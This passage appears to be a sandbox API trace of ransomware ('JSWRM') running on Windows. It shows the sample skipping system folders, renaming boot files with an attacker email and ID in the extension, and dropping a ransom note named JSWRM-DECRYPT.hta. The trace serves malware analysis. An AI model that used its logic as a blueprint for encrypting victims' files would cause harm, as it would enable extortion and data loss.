(lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.384] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.384] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9252115471983640) returned 0 [0064.384] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.384] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.384] CloseHandle (hObject=0xffffffff) returned 1 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0064.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0064.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0064.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.384] MoveFileW (lpExistingFileName="C:\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\tr-TR\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.385] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.385] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0064.385] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2=".") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="..") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="...") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="windows") returned -1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="recovery") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="perflogs") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="documents and settings") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="$RECYCLE.BIN") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="system volume information") returned 1 [0064.385] lstrcmpiW (lpString1="uk-UA", lpString2="msocache") returned 1 [0064.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236f48 [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.385] GetFileAttributesW (lpFileName="C:\\Boot\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\uk-ua\\jswrm-decrypt.hta")) returned 0xffffffff [0064.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236f48 | out: hHeap=0x1e0000) returned 1 [0064.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237178 [0064.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.386] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\uk-ua\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.386] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.386] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.387] CloseHandle (hObject=0x450) returned 1 [0064.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237178 | out: hHeap=0x1e0000) returned 1 [0064.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0064.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.389] GetFileAttributesW (lpFileName="C:\\Boot\\uk-UA\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\uk-ua\\jswrm-decrypt.hta")) returned 0x20 [0064.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0064.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.389] FindFirstFileW (in: lpFileName="C:\\Boot\\uk-UA\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d0a1367, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0064.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.389] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d0a1367, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.389] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.389] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.389] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0064.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0064.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.390] CreateFileW (lpFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.390] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.390] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.391] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.391] CloseHandle (hObject=0xffffffff) returned 1 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0064.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226130 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0064.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226130 | out: hHeap=0x1e0000) returned 1 [0064.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.391] MoveFileW (lpExistingFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\uk-UA\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.392] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d0a1367, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d0a1367, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d0a1367, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.392] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.392] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, 